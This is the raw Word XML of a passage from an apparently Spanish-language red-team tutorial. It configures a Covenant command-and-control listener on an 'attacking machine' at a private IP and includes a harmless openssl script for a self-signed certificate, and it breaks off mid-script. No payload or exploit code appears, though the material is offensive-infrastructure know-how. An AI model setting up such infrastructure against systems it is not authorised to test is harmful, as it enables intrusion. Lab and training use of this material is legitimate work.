    <w:p w14:paraId="6BC50732" w14:textId="67CB16FE" w:rsidR="00E10738" w:rsidRDefault="00E10738" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="753DF61F" wp14:editId="50F86FEF">
            <wp:extent cx="5400040" cy="5400040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1167449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9438" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId268"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05D274C0" w14:textId="77777777" w:rsidR="00E10738" w:rsidRDefault="00E10738" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D17C19A" w14:textId="77C18C99" w:rsidR="00E10738" w:rsidRDefault="00E10738" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora crearemos uno.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10770159" w14:textId="77777777" w:rsidR="00E10738" w:rsidRDefault="00E10738" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D00A706" w14:textId="6CD2AFD6" w:rsidR="00E10738" w:rsidRDefault="00E10738" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Tendremos que cambiar alguno de los valores proporcionados:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C976DF" w14:textId="77777777" w:rsidR="00E10738" w:rsidRDefault="00E10738" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="575AD96F" w14:textId="62806588" w:rsidR="00E10738" w:rsidRDefault="00E10738" w:rsidP="00E10738">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nombre: de forma predeterminada, Covenant </w:t>
      </w:r>
      <w:r w:rsidR="0063792B">
        <w:t>proporciona</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> un nombre de tipo “GUID” simple. Lo cambiaremos a Luno.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B750B12" w14:textId="78B9F473" w:rsidR="00E10738" w:rsidRDefault="00E10738" w:rsidP="00E10738">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">BindAddress y ConnectAddress: Pondremos la IP de nuestra </w:t>
      </w:r>
      <w:r w:rsidR="0063792B">
        <w:t>máquina</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D62AA6">
        <w:t>atacante</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> que es 192.168.1.44 y el puerto será el 80.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCA70D6" w14:textId="7F804C4E" w:rsidR="00E10738" w:rsidRDefault="00E10738" w:rsidP="00E10738">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>UseSSL: sería para usar el SSL, se deberá especificar un archivo de certificado SSL y una contraseña.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0176B060" w14:textId="77777777" w:rsidR="00E10738" w:rsidRDefault="00E10738" w:rsidP="00E10738">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3443FC28" w14:textId="013A196B" w:rsidR="00E10738" w:rsidRDefault="0063792B" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Usaré este script para crear un certificado:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB03311" w14:textId="77777777" w:rsidR="0063792B" w:rsidRDefault="0063792B" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DECC97D" w14:textId="77777777" w:rsidR="0063792B" w:rsidRDefault="0063792B" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FDEEE40" w14:textId="6F56318F" w:rsidR="0063792B" w:rsidRDefault="0063792B" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58B83694" wp14:editId="74002361">
            <wp:extent cx="5400040" cy="5400040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="921654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4216" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId269"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67DD42D" w14:textId="77777777" w:rsidR="0063792B" w:rsidRDefault="0063792B" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57562979" w14:textId="44016DD0" w:rsidR="0063792B" w:rsidRDefault="0063792B" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251704320" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="05DE9869" wp14:editId="4789B170">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>182880</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2360930" cy="1404620"/>
                <wp:effectExtent l="0" t="0" r="22860" b="11430"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="3087459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A78349" w14:textId="77777777" w:rsidR="00D62AA6" w:rsidRPr="004701B5" w:rsidRDefault="00D62AA6" w:rsidP="00D62AA6">
                            <w:pPr>
                              <w:rPr>
                                <w:color w:val="7030A0"/>
                                <w:sz w:val="16"/>
                                <w:szCs w:val="16"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="004701B5">
                              <w:rPr>
                                <w:color w:val="7030A0"/>
                                <w:sz w:val="16"/>
                                <w:szCs w:val="16"/>
                              </w:rPr>
                              <w:t>#!/bin/bash</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="1C6436BA" w14:textId="77777777" w:rsidR="00D62AA6" w:rsidRPr="004701B5" w:rsidRDefault="00D62AA6" w:rsidP="00D62AA6">
                            <w:pPr>
                              <w:rPr>
                                <w:color w:val="7030A0"/>
                                <w:sz w:val="16"/>
                                <w:szCs w:val="16"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="4B9441AE" w14:textId="77777777" w:rsidR="00D62AA6" w:rsidRPr="004701B5" w:rsidRDefault="00D62AA6" w:rsidP="00D62AA6">
                            <w:pPr>
                              <w:rPr>
                                <w:color w:val="7030A0"/>
                                <w:sz w:val="16"/>
                                <w:szCs w:val="16"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="004701B5">
                              <w:rPr>
                                <w:color w:val="7030A0"/>
                                <w:sz w:val="16"/>
                                <w:szCs w:val="16"/>
                              </w:rPr>
                              <w:t># Cambia el directorio a /home/Alesander</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="11A88E53" w14:textId="77777777" w:rsidR="00D62AA6" w:rsidRPr="004701B5" w:rsidRDefault="00D62AA6" w:rsidP="00D62AA6">
                            <w:pPr>
                              <w:rPr>
                                <w:color w:val="7030A0"/>
                                <w:sz w:val="16"/>
                                <w:szCs w:val="16"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="004701B5">
                              <w:rPr>
                                <w:color w:val="7030A0"/>
                                <w:sz w:val="16"/>
                                <w:szCs w:val="16"/>
                              </w:rPr>
                              <w:t>cd /home/Alesander</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="0A68BF07" w14:textId="77777777" w:rsidR="00D62AA6" w:rsidRPr="004701B5" w:rsidRDefault="00D62AA6" w:rsidP="00D62AA6">
                            <w:pPr>
                              <w:rPr>
                                <w:color w:val="7030A0"/>
                                <w:sz w:val="16"/>
                                <w:szCs w:val="16"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="6F751DD9" w14:textId="77777777" w:rsidR="00D62AA6" w:rsidRPr="004701B5" w:rsidRDefault="00D62AA6" w:rsidP="00D62AA6">
                            <w:pPr>
                              <w:rPr>
                                <w:color w:val="7030A0"/>
                                <w:sz w:val="16"/>
                                <w:szCs w:val="16"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="004701B5">
                              <w:rPr>
                                <w:color w:val="7030A0"/>
                                <w:sz w:val="16"/>
                                <w:szCs w:val="16"/>
                              </w:rPr>
                              <w:t xml:space="preserve"># Genera una clave privada de 4096 bits </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="7B06F169" w14:textId="77777777" w:rsidR="00D62AA6" w:rsidRPr="004701B5" w:rsidRDefault="00D62AA6" w:rsidP="00D62AA6">
                            <w:pPr>
                              <w:rPr>
                                <w:color w:val="7030A0"/>
                                <w:sz w:val="16"/>
                                <w:szCs w:val="16"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="004701B5">
                              <w:rPr>
                                <w:color w:val="7030A0"/>
                                <w:sz w:val="16"/>
                                <w:szCs w:val="16"/>
                              </w:rPr>
                              <w:t>openssl genrsa -out myserver.key 4096</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5468326B" w14:textId="77777777" w:rsidR="00D62AA6" w:rsidRPr="004701B5" w:rsidRDefault="00D62AA6" w:rsidP="00D62AA6">
                            <w:pPr>
                              <w:rPr>
                                <w:color w:val="7030A0"/>
                                <w:sz w:val="16"/>
                                <w:szCs w:val="16"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="3C6314A7" w14:textId="77777777" w:rsidR="00D62AA6" w:rsidRPr="004701B5" w:rsidRDefault="00D62AA6" w:rsidP="00D62AA6">
                            <w:pPr>
                              <w:rPr>
                                <w:color w:val="7030A0"/>
                                <w:sz w:val="16"/>
                                <w:szCs w:val="16"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="004701B5">
                              <w:rPr>
                                <w:color w:val="7030A0"/>
                                <w:sz w:val="16"/>
                                <w:szCs w:val="16"/>
                              </w:rPr>
                              <w:t># Crea una solicitud de firma de certificado (CSR)</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="401C2615" w14:textId="77777777" w:rsidR="00D62AA6" w:rsidRPr="004701B5" w:rsidRDefault="00D62AA6" w:rsidP="00D62AA6">
                            <w:pPr>
                              <w:rPr>
                                <w:color w:val="7030A0"/>
                                <w:sz w:val="16"/>
                                <w:szCs w:val="16"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="004701B5">
                              <w:rPr>
                                <w:color w:val="7030A0"/>
                                <w:sz w:val="16"/>
                                <w:szCs w:val="16"/>
                              </w:rPr>
                              <w:t>openssl req -new -key myserver.key -out myserver.csr</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="12EDBE30" w14:textId="77777777" w:rsidR="00D62AA6" w:rsidRPr="004701B5" w:rsidRDefault="00D62AA6" w:rsidP="00D62AA6">
                            <w:pPr>
                              <w:rPr>
                                <w:color w:val="7030A0"/>
                                <w:sz w:val="16"/>
                                <w:szCs w:val="16"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="45A5E0A6" w14:textId="77777777" w:rsidR="00D62AA6" w:rsidRPr="004701B5" w:rsidRDefault="00D62AA6" w:rsidP="00D62AA6">
                            <w:pPr>
                              <w:rPr>
                                <w:color w:val="7030A0"/>
                                <w:sz w:val="16"/>
                                <w:szCs w:val="16"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="004701B5">
                              <w:rPr>
                                <w:color w:val="7030A0"/>
                                <w:sz w:val="16"/>
                                <w:szCs w:val="16"/>
                              </w:rPr>
                              <w:t># Genera un certificado SSL autofirmado de un año</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="07A81667" w14:textId="77777777" w:rsidR="00D62AA6" w:rsidRPr="004701B5" w:rsidRDefault="00D62AA6" w:rsidP="00D62AA6">
                            <w:pPr>
                              <w:rPr>
                                <w:color w:val="7030A0"/>
                                <w:sz w:val="16"/>
                                <w:szCs w:val="16"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="004701B5">
                              <w:rPr>
                                <w:color w:val="7030A0"/>
                                <w:sz w:val="16"/>
                                <w:szCs w:val="16"/>
                              </w:rPr>
                              <w:t>openssl x509 -req -days 365 -in myserver.csr -signkey myserver.key -out myserver.crt</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="56701594" w14:textId="77777777" w:rsidR="00D62AA6" w:rsidRPr="004701B5" w:rsidRDefault="00D62AA6" w:rsidP="00D62AA6">
                            <w:pPr>
                              <w:rPr>
                                <w:color w:val="7030A0"/>
                                <w:sz w:val="16"/>
                                <w:szCs w:val="16"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="24F8B665" w14:textId="77777777" w:rsidR="00D62AA6" w:rsidRPr="004701B5" w:rsidRDefault="00D62AA6" w:rsidP="00D62AA6">
                            <w:pPr>
                              <w:rPr>
                                <w:color w:val="7030A0"/>
                                <w:sz w:val="16"/>
                                <w:szCs w:val="16"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="004701B5">
                              <w:rPr>
                                <w:color w:val="7030A0"/>
                                <w:sz w:val="16"/>
                                <w:szCs w:val="16"/>
                              </w:rPr>
                              <w:t># Ve los detalles del certificado</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="7479FC2E" w14:textId="77777777" w:rsidR="00D62AA6" w:rsidRPr="004701B5" w:rsidRDefault="00D62AA6" w:rsidP="00D62AA6">
                            <w:pPr>
                              <w:rPr>
                                <w:color w:val="7030A0"/>
                                <w:sz w:val="16"/>
                                <w:szCs w:val="16"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="004701B5">
                              <w:rPr>
                                <w:color w:val="7030A0"/>
                                <w:sz w:val="16"/>
                                <w:szCs w:val="16"/>
                              </w:rPr>
                              <w:t>openssl x509 -in myserver.crt -text</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="06CC7975" w14:textId="77777777" w:rsidR="00D62AA6" w:rsidRPr="004701B5" w:rsidRDefault="00D62AA6" w:rsidP="00D62AA6">
                            <w:pPr>
                              <w:rPr>
                                <w:color w:val="7030A0"/>
                                <w:sz w:val="16"/>
                                <w:szCs w:val="16"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="6D5C4402" w14:textId="77777777" w:rsidR="00D62AA6" w:rsidRPr="004701B5" w:rsidRDefault="00D62AA6" w:rsidP="00D62AA6">
                            <w:pPr>
                              <w:rPr>
                                <w:color w:val="7030A0"/>
                                <w:sz w:val="16"/>
                                <w:szCs w:val="16"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="004701B5">
                              <w:rPr>
                                <w:color w:val="7030A0"/>
                                <w:sz w:val="16"/>
                                <w:szCs w:val="16"/>
                              </w:rPr>
                              <w:t># Copia los archivos clave y certificado en un directorio "ssl"</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="07A9FE03" w14:textId="77777777" w:rsidR="00D62AA6" w:rsidRPr="004701B5" w:rsidRDefault="00D62AA6" w:rsidP="00D62AA6">
                            <w:pPr>
                              <w:rPr>
                                <w:color w:val="7030A0"/>
                                <w:sz w:val="16"/>
                                <w:szCs w:val="16"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="004701B5">
                              <w:rPr>
                                <w:color w:val="7030A0"/>
                                <w:sz w:val="16"/>
                                <w:szCs w:val="16"/>
                              </w:rPr>
                              <w:t>mkdir ssl</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="1F82612E" w14:textId="77777777" w:rsidR="00D62AA6" w:rsidRPr="004701B5" w:rsidRDefault="00D62AA6" w:rsidP="00D62AA6">
                            <w:pPr>
                              <w:rPr>
                                <w:color w:val="7030A0"/>
                                <w:sz w:val="16"/>
                                <w:szCs w:val="16"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="004701B5">
                              <w:rPr>
                                <w:color w:val="7030A0"/>
                                <w:sz w:val="16"/>
                                <w:szCs w:val="16"/>
                              </w:rPr>
                              <w:t>cp myserver.key ssl/</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="67D6DC01" w14:textId="77777777" w:rsidR="00D62AA6" w:rsidRPr="004701B5" w:rsidRDefault="00D62AA6" w:rsidP="00D62AA6">
                            <w:pPr>
                              <w:rPr>
                                <w:color w:val="7030A0"/>
                                <w:sz w:val="16"/>
                                <w:szCs w:val="16"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="004701B5">
                              <w:rPr>
                                <w:color w:val="7030A0"/>
                                <w:sz w:val="16"/>
                                <w:szCs w:val="16"/>
                              </w:rPr>
                              <w:t>cp myserver.crt ssl/</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="38C2F857" w14:textId="77777777" w:rsidR="00D62AA6" w:rsidRPr="004701B5" w:rsidRDefault="00D62AA6" w:rsidP="00D62AA6">
                            <w:pPr>
                              <w:rPr>
                                <w:color w:val="7030A0"/>
                                <w:sz w:val="16"/>
                                <w:szCs w:val="16"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="2ABE039D" w14:textId="77777777" w:rsidR="00D62AA6" w:rsidRPr="004701B5" w:rsidRDefault="00D62AA6" w:rsidP="00D62AA6">
                            <w:pPr>
                              <w:rPr>
                                <w:color w:val="7030A0"/>
                                <w:sz w:val="16"/>
                                <w:szCs w:val="16"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="004701B5">
                              <w:rPr>
                                <w:color w:val="7030A0"/>
                                <w:sz w:val="16"/>
                                <w:szCs w:val="16"/>
                              </w:rPr>
                              <w:t># Cambia los permisos del directorio y los archivos</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="569D67FD" w14:textId="77777777" w:rsidR="00D62AA6" w:rsidRPr="004701B5" w:rsidRDefault="00D62AA6" w:rsidP="00D62AA6">
                            <w:pPr>
                              <w:rPr>
                                <w:color w:val="7030A0"/>
                                <w:sz w:val="16"/>
                                <w:szCs w:val="16"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="004701B5">
                              <w:rPr>
                                <w:color w:val="7030A0"/>
                                <w:sz w:val="16"/>
                                <w:szCs w:val="16"/>
                              </w:rPr>
                              <w:t>chmod 700 ssl</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6FAB3976" w14:textId="77777777" w:rsidR="00D62AA6" w:rsidRPr="004701B5" w:rsidRDefault="00D62AA6" w:rsidP="00D62AA6">
                            <w:pPr>
                              <w:rPr>
                                <w:color w:val="7030A0"/>
                                <w:sz w:val="16"/>
                                <w:szCs w:val="16"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="004701B5">
                              <w:rPr>
                                <w:color w:val="7030A0"/>
                                <w:sz w:val="16"/>
                                <w:szCs w:val="16"/>
                              </w:rPr>
                              <w:t>chmod 600 ssl/myserver.key</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="16C85AEE" w14:textId="77777777" w:rsidR="00D62AA6" w:rsidRPr="004701B5" w:rsidRDefault="00D62AA6" w:rsidP="00D62AA6">
                            <w:pPr>
                              <w:rPr>
                                <w:color w:val="7030A0"/>
                                <w:sz w:val="16"/>
                                <w:szCs w:val="16"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="004701B5">
                              <w:rPr>
                                <w:color w:val="7030A0"/>
                                <w:sz w:val="16"/>
                                <w:szCs w:val="16"/>
                              </w:rPr>
                              <w:t>chmod 644 ssl/myserver.crt</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="1F552811" w14:textId="77777777" w:rsidR="00D62AA6" w:rsidRPr="004701B5" w:rsidRDefault="00D62AA6" w:rsidP="00D62AA6">
                            <w:pPr>
                              <w:rPr>
                                <w:color w:val="7030A0"/>
                                <w:sz w:val="16"/>
                                <w:szCs w:val="16"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="20EED238" w14:textId="77777777" w:rsidR="00D62AA6" w:rsidRPr="004701B5" w:rsidRDefault="00D62AA6" w:rsidP="00D62AA6">
                            <w:pPr>
                              <w:rPr>
                                <w:color w:val="7030A0"/>
                                <w:sz w:val="16"/>
                                <w:szCs w:val="16"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="004701B5">
                              <w:rPr>
                                <w:color w:val="7030A0"/>
                                <w:sz w:val="16"/>
                                <w:szCs w:val="16"/>
                              </w:rPr>
                              <w:t xml:space="preserve"># Muestra donde se guardaron los archivos </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="0503711C" w14:textId="77777777" w:rsidR="00D62AA6" w:rsidRPr="004701B5" w:rsidRDefault="00D62AA6" w:rsidP="00D62AA6">
                            <w:pPr>
                              <w:rPr>
                                <w:color w:val="7030A0"/>
                                <w:sz w:val="16"/>
                                <w:szCs w:val="16"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="004701B5">
                              <w:rPr>
                                <w:color w:val="7030A0"/>
                                <w:sz w:val="16"/>
                                <w:szCs w:val="16"/>
                              </w:rPr>
                              <w:t xml:space="preserve">echo "Los archivos clave y certificado se guardaron en:" </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="7016EC93" w14:textId="77777777" w:rsidR="00D62AA6" w:rsidRPr="004701B5" w:rsidRDefault="00D62AA6" w:rsidP="00D62AA6">
                            <w:pPr>
                              <w:rPr>
                                <w:color w:val="7030A0"/>
                                <w:sz w:val="16"/>
                                <w:szCs w:val="16"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="004701B5">
                              <w:rPr>
                                <w:color w:val="7030A0"/>
                                <w:sz w:val="16"/>
                                <w:szCs w:val="16"/>
                              </w:rPr>
                              <w:t>pwd/ssl</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="67BA759D" w14:textId="3B06D748" w:rsidR="0063792B" w:rsidRDefault="0063792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DE9869" id="_x0000_s1065" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:14.4pt;width:185.9pt;height:110.6pt;z-index:2517043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Xk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LqML0SwFdYPhNbhsXXpq9GiRfeLs57atuT+5x6c5Ex/NFSe5Xg2i32ejNn8LbFk&#10;7tJTXXrACJIqeeDsuNyE9DcSOHtDZdyqBPg5klPM1I6J++nrxH6/tNOp5w++fgQ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4&#10;n9XkFgIAACgEAAAOAAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAA&#10;IQBIWydy2wAAAAcBAAAPAAAAAAAAAAAAAAAAAHAEAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQA&#10;BADzAAAAeAUAAAAA&#10;">
                <v:textbox style="mso-fit-shape-to-text:t">
                  <w:txbxContent>
                    <w:p w14:paraId="13A78349" w14:textId="77777777" w:rsidR="00D62AA6" w:rsidRPr="004701B5" w:rsidRDefault="00D62AA6" w:rsidP="00D62AA6">
                      <w:pPr>
                        <w:rPr>
                          <w:color w:val="7030A0"/>
                          <w:sz w:val="16"/>
                          <w:szCs w:val="16"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="004701B5">
                        <w:rPr>
                          <w:color w:val="7030A0"/>
                          <w:sz w:val="16"/>
                          <w:szCs w:val="16"/>
                        </w:rPr>
                        <w:t>#!/bin/bash</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="1C6436BA" w14:textId="77777777" w:rsidR="00D62AA6" w:rsidRPr="004701B5" w:rsidRDefault="00D62AA6" w:rsidP="00D62AA6">
                      <w:pPr>
                        <w:rPr>
                          <w:color w:val="7030A0"/>
                          <w:sz w:val="16"/>
                          <w:szCs w:val="16"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="4B9441AE" w14:textId="77777777" w:rsidR="00D62AA6" w:rsidRPr="004701B5" w:rsidRDefault="00D62AA6" w:rsidP="00D62AA6">
                      <w:pPr>
                        <w:rPr>
                          <w:color w:val="7030A0"/>
                          <w:sz w:val="16"/>
                          <w:szCs w:val="16"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="004701B5">
                        <w:rPr>
                          <w:color w:val="7030A0"/>
                          <w:sz w:val="16"/>
                          <w:szCs w:val="16"/>
                        </w:rPr>
                        <w:t># Cambia el directorio a /home/Alesander</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="11A88E53" w14:textId="77777777" w:rsidR="00D62AA6" w:rsidRPr="004701B5" w:rsidRDefault="00D62AA6" w:rsidP="00D62AA6">
                      <w:pPr>
                        <w:rPr>
                          <w:color w:val="7030A0"/>
                          <w:sz w:val="16"/>
                          <w:szCs w:val="16"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="004701B5">
                        <w:rPr>
                          <w:color w:val="7030A0"/>
                          <w:sz w:val="16"/>
                          <w:szCs w:val="16"/>
                        </w:rPr>
                        <w:t>cd /home/Alesander</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="0A68BF07" w14:textId="77777777" w:rsidR="00D62AA6" w:rsidRPr="004701B5" w:rsidRDefault="00D62AA6" w:rsidP="00D62AA6">
                      <w:pPr>
                        <w:rPr>
                          <w:color w:val="7030A0"/>
                          <w:sz w:val="16"/>
                          <w:szCs w:val="16"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="6F751DD9" w14:textId="77777777" w:rsidR="00D62AA6" w:rsidRPr="004701B5" w:rsidRDefault="00D62AA6" w:rsidP="00D62AA6">
                      <w:pPr>
                        <w:rPr>
                          <w:color w:val="7030A0"/>
                          <w:sz w:val="16"/>
                          <w:szCs w:val="16"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="004701B5">
                        <w:rPr>
                          <w:color w:val="7030A0"/>
                          <w:sz w:val="16"/>
                          <w:szCs w:val="16"/>
                        </w:rPr>
                        <w:t xml:space="preserve"># Genera una clave privada de 4096 bits </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="7B06F169" w14:textId="77777777" w:rsidR="00D62AA6" w:rsidRPr="004701B5" w:rsidRDefault="00D62AA6" w:rsidP="00D62AA6">
                      <w:pPr>
                        <w:rPr>
                          <w:color w:val="7030A0"/>
                          <w:sz w:val="16"/>
                          <w:szCs w:val="16"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="004701B5">
                        <w:rPr>
                          <w:color w:val="7030A0"/>
                          <w:sz w:val="16"/>
                          <w:szCs w:val="16"/>
                        </w:rPr>
                        <w:t>openssl genrsa -out myserver.key 4096</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5468326B" w14:textId="77777777" w:rsidR="00D62AA6" w:rsidRPr="004701B5" w:rsidRDefault="00D62AA6" w:rsidP="00D62AA6">
                      <w:pPr>
                        <w:rPr>
                          <w:color w:val="7030A0"/>
                          <w:sz w:val="16"/>
                          <w:szCs w:val="16"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="3C6314A7" w14:textId="77777777" w:rsidR="00D62AA6" w:rsidRPr="004701B5" w:rsidRDefault="00D62AA6" w:rsidP="00D62AA6">
                      <w:pPr>
                        <w:rPr>
                          <w:color w:val="7030A0"/>
                          <w:sz w:val="16"/>
                          <w:szCs w:val="16"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="004701B5">
                        <w:rPr>
                          <w:color w:val="7030A0"/>
                          <w:sz w:val="16"/>
                          <w:szCs w:val="16"/>
                        </w:rPr>
                        <w:t># Crea una solicitud de firma de certificado (CSR)</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="401C2615" w14:textId="77777777" w:rsidR="00D62AA6" w:rsidRPr="004701B5" w:rsidRDefault="00D62AA6" w:rsidP="00D62AA6">
                      <w:pPr>
                        <w:rPr>
                          <w:color w:val="7030A0"/>
